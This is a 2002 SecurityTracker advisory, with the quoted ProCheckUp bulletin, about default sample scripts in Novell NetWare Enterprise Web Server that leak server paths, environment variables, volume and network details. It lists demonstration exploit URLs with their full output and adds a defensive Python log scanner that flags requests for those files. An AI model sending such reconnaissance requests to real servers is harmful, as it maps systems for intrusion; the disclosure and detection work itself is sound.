Novell NetWare Enterprise Web Server Default Files Disclose Server Information to Remote Users
SecurityTracker Alert ID: 1004401
SecurityTracker URL: http://securitytracker.com/id/1004401
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 29 2002
Impact: Disclosure of system information
Exploit Included: Yes
Version(s): 5.0
Description:
An information disclosure vulnerability was reported in some default programs installed with Novell's NetWare Enterprise Web Server. A remote user can gain information about the server, including the physical path of the web root directory and other parameters.
ProCheckUp reported that a remote user can obtain information about the server.
In the default installation, NetWare installs a web server on port 80 and installs several sample files that can be used by a remote user to obtain information. The vulnerable sample files include:
allfield.jse
test.jse
env.pl
lancgi.pl
volscgi.pl
ndslogin.pl
websinfo.bas
A remote user can supply specific URLs invoking these sample files to determine various information about the server.
Some demonstration exploit URLs and the type of information they return are shown below.
1) allfield.jse
URL:
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
Information Returned:
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE"
_argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"
Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
HTTP_ACCEPT_LANGUAGE=en-gb
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109
HTTP_CONNECTION=Keep-Alive
HTTP_COOKIE=N2S19P61=963269677
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
NETSITE_ROOT=/novonyx/suitespot
SERVER_NAMES=lcgi
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
NS_SESSION=-751448704
NS_REQUEST=-695399320
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
2) test.jse
URL:
http://[server]/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
Information Returned:
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
NS_SESSION=-798892160
NS_REQUEST=-800372600
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
http://192.168.1.109
3) env.pl
URL:
http://webserver/perl/samples/env.pl
Information Returned:
HSERVER_SOFTWARE Netscape 3.5 for NetWare
GATEWAY_INTERFACE LCGI/1.1
NS_SESSION -707141760
REMOTE_ADDR 192.168.1.250
SERVER_PROTOCOL HTTP/1.1
NS_REQUEST -695399320
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
REQUEST_METHOD GET
REMOTE_HOST 192.168.1.250
SERVER_URL http://192.168.1.109
SERVER_NAMES perl
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_CONNECTION Keep-Alive
HTTP_ACCEPT_LANGUAGE en-gb
HTTPS OFF
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
FN lcgi_map_init
SCRIPT_NAME /perl
HTTP_ACCEPT_ENCODING gzip, deflate
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
SERVER_NAME NETWARE.PROCHECKUP.COM
PATH_INFO /samples/env.pl
HTTP_COOKIE N2S19P61=963269677
SERVER_PORT 80
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
HTTP_HOST 192.168.1.109
PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot
4) lancgi.pl
URL:
http://webserver/perl/samples/lancgi.pl
Information Returned:
Description, Address, Media Type, Board Number, Board Instance
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_802.2 1 1
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_II 2 1
5) volscgi.pl
URL:
http://webserver/perl/samples/volscgi.pl
Information Returned: (information about the volumes)
Description, Total Space, Free Space, Block Size, Total Dir
SYS 6065984 5390848 65536 66048
6) ndslogin.pl
URL:
http://webserver/perl/samples/ndslogin.pl
Information Returned:
According to the report, this script appears to allow remote interactive logins with NDS tree viewing:
Fullname: ex: nds:\\novell_tree\novell_context
Username: *
Password:
7) websinfo.bas
URL:
http://webserver/netbasic/websinfo.bas
Information Returned: (information includes the server name and the exact NetWare version running)
Company: Novell
Revision: NetWare 5.00i
Date: 27 March 2000
Impact:
A remote user can determine information about the server, including the web root directory location, the exact version number, and data on the volumes and the local network media.
Solution:
No solution was available at the time of this entry.
The author of the report recommends removing the default example files.
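Until the sample files are removed, requests for them can be flagged in the web server's access log. The following is an added example, not part of the advisory or the ProCheckUp bulletin; it assumes the log is in Common Log Format, and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# The seven sample files named in the advisory.
SAMPLE_FILES = {"allfield.jse", "test.jse", "env.pl", "lancgi.pl",
                "volscgi.pl", "ndslogin.pl", "websinfo.bas"}

# Assumption: the access log uses Common Log Format.
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2002:09:34:40 -0400] "GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1" 200 2143',
    '192.0.2.10 - - [29/May/2002:09:34:41 -0400] "GET /perl/samples/ENV.PL HTTP/1.1" 200 1822',
    '198.51.100.7 - - [29/May/2002:09:35:02 -0400] "GET /netbasic/websinfo%2Ebas HTTP/1.0" 404 210',
    '203.0.113.5 - - [29/May/2002:09:36:00 -0400] "GET /index.html HTTP/1.1" 200 5120',
]

def sample_file_hit(target):
    """Return the sample file a request target refers to, or None."""
    for _ in range(2):                      # undo single and double percent-encoding
        target = unquote(target)
    # The advisory's output shows the same paths in mixed case, so compare lower-cased.
    target = target.replace("\\", "/").lower()
    # The .jse files arrive in the query string, the others in the path.
    for token in re.split(r"[/?&=:;]+", target):
        if token in SAMPLE_FILES:
            return token
    return None

def detect(lines):
    """Return one record per logged request that names a sample file."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                        # skip lines that are not CLF
        client, when, _method, target, status = m.groups()
        name = sample_file_hit(target)
        if name:
            # A 200 means the file is still installed and answered the request.
            hits.append({"client": client, "time": when, "file": name,
                         "served": status == "200"})
    return hits

if __name__ == "__main__":
    for h in detect(SAMPLE_LOG):
        state = "SERVED (file still installed)" if h["served"] else "not served"
        print(f'{h["time"]} {h["client"]} {h["file"]}: {state}')
```

A hit with a 200 status shows the file is still present and returned its output; a site that has its own file with one of these names will also match and needs an allow-list entry.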
Vendor URL: www.novell.com/
Cause: Access control error, Configuration error
Underlying OS:
Message History: None.
Source Message Contents
Date: Wed, 29 May 2002 09:34:40 -0400
Subject: ProCheckUp Security Bulletin PR02-01
Vulnerabilities discovered by ProCheckUp
The vulnerabilities detailed below were all discovered using our
revolutionary ProCheckNet technology.
29th May 2002
ProCheckUp Security Bulletin PR02-01
CERT: VU#159203
Description: Netware default programs display server variables
including web root location.
Date: 8/1/2002
Date Public: 29 May 2002
Application: Netware enterprise web server
Platform: Novell Netware 5.0
Severity: Remote attackers can discover the location of the webroot.
Author: Richard Brain
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln_pr0201.html
Description:
Netware 5.1 installed with default settings, installs with the Novonyx
webserver. This web server resides on port 80 and comes with sample
files which disclose information.
1) Requesting the following url :-
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
The following information is returned:-
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE"
_argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"
Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
HTTP_ACCEPT_LANGUAGE=en-gb
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109
HTTP_CONNECTION=Keep-Alive
HTTP_COOKIE=N2S19P61=963269677
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
NETSITE_ROOT=/novonyx/suitespot
SERVER_NAMES=lcgi
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
NS_SESSION=-751448704
NS_REQUEST=-695399320
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
==========================================================
2) ALSO
Requesting the following url :-
http://192.168.1.109/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
The following information is returned:-
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
NS_SESSION=-798892160
NS_REQUEST=-800372600
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
http://192.168.1.109
3) ALSO
Requesting the following url :-
http://webserver/perl/samples/env.pl
The following information is returned:-
HSERVER_SOFTWARE Netscape 3.5 for NetWare
GATEWAY_INTERFACE LCGI/1.1
NS_SESSION -707141760
REMOTE_ADDR 192.168.1.250
SERVER_PROTOCOL HTTP/1.1
NS_REQUEST -695399320
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
REQUEST_METHOD GET
REMOTE_HOST 192.168.1.250
SERVER_URL http://192.168.1.109
SERVER_NAMES perl
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_CONNECTION Keep-Alive
HTTP_ACCEPT_LANGUAGE en-gb
HTTPS OFF
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
FN lcgi_map_init
SCRIPT_NAME /perl
HTTP_ACCEPT_ENCODING gzip, deflate
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
SERVER_NAME NETWARE.PROCHECKUP.COM
PATH_INFO /samples/env.pl
HTTP_COOKIE N2S19P61=963269677
SERVER_PORT 80
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
HTTP_HOST 192.168.1.109
PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot
Solution/Fix:
Delete all default example programs if not needed.
Legal:
Copyright 2002 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to ProCheckUp, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party.